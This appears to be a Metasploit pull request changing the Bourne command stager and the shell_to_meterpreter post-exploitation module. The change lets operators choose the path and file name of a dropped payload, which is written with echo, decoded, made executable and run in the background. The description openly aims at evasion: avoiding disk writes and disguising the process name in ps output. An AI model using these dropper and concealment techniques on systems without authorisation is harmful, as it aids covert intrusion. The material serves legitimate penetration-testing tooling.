### PR TITLE
Add support for specifying path, file in bourne dropper

### DIFF
--- a/lib/rex/exploitation/cmdstager/bourne.rb
+++ b/lib/rex/exploitation/cmdstager/bourne.rb
@@ -13,7 +13,7 @@ class CmdStagerBourne < CmdStagerBase
     super
 
     @var_encoded = Rex::Text.rand_text_alpha(5) + '.b64'
-    @var_decoded = Rex::Text.rand_text_alpha(5) + '.bin'
+    @var_decoded = Rex::Text.rand_text_alpha(5)
   end
 
   def generate(opts = {})

--- a/lib/rex/exploitation/cmdstager/bourne.rb
+++ b/lib/rex/exploitation/cmdstager/bourne.rb
@@ -33,7 +33,7 @@ class CmdStagerBourne < CmdStagerBase
   def generate_cmds(opts)
     # Set the start/end of the commands here (vs initialize) so we have @tempdir
     @cmd_start = "echo -n "
-    @cmd_end   = ">>#{@tempdir}#{@var_encoded}"
+    @cmd_end   = ">>\"#{@tempdir}#{@var_encoded}\""
     xtra_len = @cmd_start.length + @cmd_end.length + 1
     opts.merge!({ :extra => xtra_len })
     super
@@ -82,27 +82,27 @@ class CmdStagerBourne < CmdStagerBase
       decoder_cmd << "(which #{binary} >&2 && #{cmd})"
     end
     decoder_cmd = decoder_cmd.join(" || ")
-    decoder_cmd = "(" << decoder_cmd << ") 2> /dev/null > #{@tempdir}#{@var_decoded} < #{@tempdir}#{@var_encoded}"
+    decoder_cmd = "(" << decoder_cmd << ") 2> /dev/null > \"#{@tempdir}#{@var_decoded}\" < \"#{@tempdir}#{@var_encoded}\""
     [ decoder_cmd ]
   end
 
   def compress_commands(cmds, opts)
     # Make it all happen
-    cmds << "chmod +x #{@tempdir}#{@var_decoded}"
+    cmds << "chmod +x \"#{@tempdir}#{@var_decoded}\""
     # Background the process, allowing the cleanup code to continue and delete the data
     # while allowing the original shell to continue to function since it isn't waiting
     # on the payload to exit.  The 'sleep' is required as '&' is a command terminator
     # and having & and the cmds delimiter ';' next to each other is invalid.
     if opts[:background]
-      cmds << "#{@tempdir}#{@var_decoded} & sleep 2"
+      cmds << "\"#{@tempdir}#{@var_decoded}\" & sleep 2"
     else
-      cmds << "#{@tempdir}#{@var_decoded}"
+      cmds << "\"#{@tempdir}#{@var_decoded}\""
     end
 
     # Clean up after unless requested not to..
     if (not opts[:nodelete])
-      cmds << "rm -f #{@tempdir}#{@var_decoded}"
-      cmds << "rm -f #{@tempdir}#{@var_encoded}"
+      cmds << "rm -f \"#{@tempdir}#{@var_decoded}\""
+      cmds << "rm -f \"#{@tempdir}#{@var_encoded}\""
     end
 
     super

--- a/lib/rex/exploitation/cmdstager/bourne.rb
+++ b/lib/rex/exploitation/cmdstager/bourne.rb
@@ -12,14 +12,18 @@ class CmdStagerBourne < CmdStagerBase
   def initialize(exe)
     super
 
-    @var_encoded = Rex::Text.rand_text_alpha(5)
-    @var_decoded = Rex::Text.rand_text_alpha(5)
+    @var_encoded = Rex::Text.rand_text_alpha(5) + '.b64'
+    @var_decoded = Rex::Text.rand_text_alpha(5) + '.bin'
   end
 
   def generate(opts = {})
     opts[:temp] = opts[:temp] || '/tmp/'
     opts[:temp] = opts[:temp].gsub(/'/, "\\\\'")
     opts[:temp] = opts[:temp].gsub(/ /, "\\ ")
+    if (opts[:file])
+        @var_encoded = opts[:file] + '.b64'
+        @var_decoded = opts[:file]
+    end
     super
   end
 
@@ -29,7 +33,7 @@ class CmdStagerBourne < CmdStagerBase
   def generate_cmds(opts)
     # Set the start/end of the commands here (vs initialize) so we have @tempdir
     @cmd_start = "echo -n "
-    @cmd_end   = ">>#{@tempdir}#{@var_encoded}.b64"
+    @cmd_end   = ">>#{@tempdir}#{@var_encoded}"
     xtra_len = @cmd_start.length + @cmd_end.length + 1
     opts.merge!({ :extra => xtra_len })
     super
@@ -78,27 +82,27 @@ class CmdStagerBourne < CmdStagerBase
       decoder_cmd << "(which #{binary} >&2 && #{cmd})"
     end
     decoder_cmd = decoder_cmd.join(" || ")
-    decoder_cmd = "(" << decoder_cmd << ") 2> /dev/null > #{@tempdir}#{@var_decoded}.bin < #{@tempdir}#{@var_encoded}.b64"
+    decoder_cmd = "(" << decoder_cmd << ") 2> /dev/null > #{@tempdir}#{@var_decoded} < #{@tempdir}#{@var_encoded}"
     [ decoder_cmd ]
   end
 
   def compress_commands(cmds, opts)
     # Make it all happen
-    cmds << "chmod +x #{@tempdir}#{@var_decoded}.bin"
+    cmds << "chmod +x #{@tempdir}#{@var_decoded}"
     # Background the process, allowing the cleanup code to continue and delete the data
     # while allowing the original shell to continue to function since it isn't waiting
     # on the payload to exit.  The 'sleep' is required as '&' is a command terminator
     # and having & and the cmds delimiter ';' next to each other is invalid.
     if opts[:background]
-      cmds << "#{@tempdir}#{@var_decoded}.bin & sleep 2"
+      cmds << "#{@tempdir}#{@var_decoded} & sleep 2"
     else
-      cmds << "#{@tempdir}#{@var_decoded}.bin"
+      cmds << "#{@tempdir}#{@var_decoded}"
     end
 
     # Clean up after unless requested not to..
     if (not opts[:nodelete])
-      cmds << "rm -f #{@tempdir}#{@var_decoded}.bin"
-      cmds << "rm -f #{@tempdir}#{@var_encoded}.b64"
+      cmds << "rm -f #{@tempdir}#{@var_decoded}"
+      cmds << "rm -f #{@tempdir}#{@var_encoded}"
     end
 
     super

--- a/lib/rex/exploitation/cmdstager/bourne.rb
+++ b/lib/rex/exploitation/cmdstager/bourne.rb
@@ -33,7 +33,7 @@ class CmdStagerBourne < CmdStagerBase
   def generate_cmds(opts)
     # Set the start/end of the commands here (vs initialize) so we have @tempdir
     @cmd_start = "echo -n "
-    @cmd_end   = ">>\"#{@tempdir}#{@var_encoded}\""
+    @cmd_end   = ">>'#{@tempdir}#{@var_encoded}'"
     xtra_len = @cmd_start.length + @cmd_end.length + 1
     opts.merge!({ :extra => xtra_len })
     super
@@ -82,27 +82,27 @@ class CmdStagerBourne < CmdStagerBase
       decoder_cmd << "(which #{binary} >&2 && #{cmd})"
     end
     decoder_cmd = decoder_cmd.join(" || ")
-    decoder_cmd = "(" << decoder_cmd << ") 2> /dev/null > \"#{@tempdir}#{@var_decoded}\" < \"#{@tempdir}#{@var_encoded}\""
+    decoder_cmd = "(" << decoder_cmd << ") 2> /dev/null > '#{@tempdir}#{@var_decoded}' < '#{@tempdir}#{@var_encoded}'"
     [ decoder_cmd ]
   end
 
   def compress_commands(cmds, opts)
     # Make it all happen
-    cmds << "chmod +x \"#{@tempdir}#{@var_decoded}\""
+    cmds << "chmod +x '#{@tempdir}#{@var_decoded}'"
     # Background the process, allowing the cleanup code to continue and delete the data
     # while allowing the original shell to continue to function since it isn't waiting
     # on the payload to exit.  The 'sleep' is required as '&' is a command terminator
     # and having & and the cmds delimiter ';' next to each other is invalid.
     if opts[:background]
-      cmds << "\"#{@tempdir}#{@var_decoded}\" & sleep 2"
+      cmds << "'#{@tempdir}#{@var_decoded}' & sleep 2"
     else
-      cmds << "\"#{@tempdir}#{@var_decoded}\""
+      cmds << "'#{@tempdir}#{@var_decoded}'"
     end
 
     # Clean up after unless requested not to..
     if (not opts[:nodelete])
-      cmds << "rm -f \"#{@tempdir}#{@var_decoded}\""
-      cmds << "rm -f \"#{@tempdir}#{@var_encoded}\""
+      cmds << "rm -f '#{@tempdir}#{@var_decoded}'"
+      cmds << "rm -f '#{@tempdir}#{@var_encoded}'"
     end
 
     super

--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -190,7 +190,7 @@ class Metasploit3 < Msf::Post
     end
     opts = {
       :linemax => linemax,
-      :nodelete => true # keep temp files (for debugging)
+      #:nodelete => true # keep temp files (for debugging)
     }
     if session.platform =~ /win/i
       opts[:decoder] = File.join(Msf::Config.data_directory, 'exploits', 'cmdstager', 'vbs_b64')

--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -190,7 +190,7 @@ class Metasploit3 < Msf::Post
     end
     opts = {
       :linemax => linemax,
-      #:nodelete => true # keep temp files (for debugging)
+      :nodelete => true # keep temp files (for debugging)
     }
     if session.platform =~ /win/i
       opts[:decoder] = File.join(Msf::Config.data_directory, 'exploits', 'cmdstager', 'vbs_b64')

--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -43,9 +43,9 @@ class Metasploit3 < Msf::Post
       OptString.new('PAYLOAD_OVERRIDE',
         [false, 'Define the payload to use (meterpreter/reverse_tcp by default) .', nil]),
       OptString.new('BOURNE_PATH',
-        [false, 'Remote path to drop binary', nil]),
+        [false, 'Remote path to drop binary']),
       OptString.new('BOURNE_FILE',
-        [false, 'Remote filename to use for dropped binary', nil])
+        [false, 'Remote filename to use for dropped binary'])
     ], self.class)
     deregister_options('PERSIST', 'PSH_OLD_METHOD', 'RUN_WOW64')
   end

--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -41,7 +41,11 @@ class Metasploit3 < Msf::Post
       OptEnum.new('WIN_TRANSFER',
         [true, 'Which method to try first to transfer files on a Windows target.', 'POWERSHELL', ['POWERSHELL', 'VBS']]),
       OptString.new('PAYLOAD_OVERRIDE',
-        [false, 'Define the payload to use (meterpreter/reverse_tcp by default) .', nil])
+        [false, 'Define the payload to use (meterpreter/reverse_tcp by default) .', nil]),
+      OptString.new('BOURNE_PATH',
+        [false, 'Remote path to drop binary', nil]),
+      OptString.new('BOURNE_FILE',
+        [false, 'Remote filename to use for dropped binary', nil])
     ], self.class)
     deregister_options('PERSIST', 'PSH_OLD_METHOD', 'RUN_WOW64')
   end
@@ -193,6 +197,8 @@ class Metasploit3 < Msf::Post
       cmdstager = Rex::Exploitation::CmdStagerVBS.new(exe)
     else
       opts[:background] = true
+      opts[:temp] = datastore['BOURNE_PATH']
+      opts[:file] = datastore['BOURNE_FILE']
       cmdstager = Rex::Exploitation::CmdStagerBourne.new(exe)
       # Note: if a OS X binary payload is added in the future, use CmdStagerPrintf
       #       as /bin/sh on OS X doesn't support the -n option on echo


### PR DESCRIPTION
Currently when using `shell_to_meterpreter` on a unix system which falls back to the bourne stager, the payload is dropped in `/tmp/` with a random 5 character filename ending in `.bin`. This is undesirable in some cases as `tmp` is not necessarily a `tmpfs` (thereby touching disk), and random `.bin` filenames look suspicious in `ps` output.

This PR allows you to set the path (`BOURNE_PATH`) and the filename (`BOURNE_FILE`) as advanced options which the module then uses. Paths are quoted so it's possible to use a path such as `"/usr/bin/python2.7 "` (assuming root)

Default behaviour is not changed.

This also affects `sessions -u` (via `setg`)
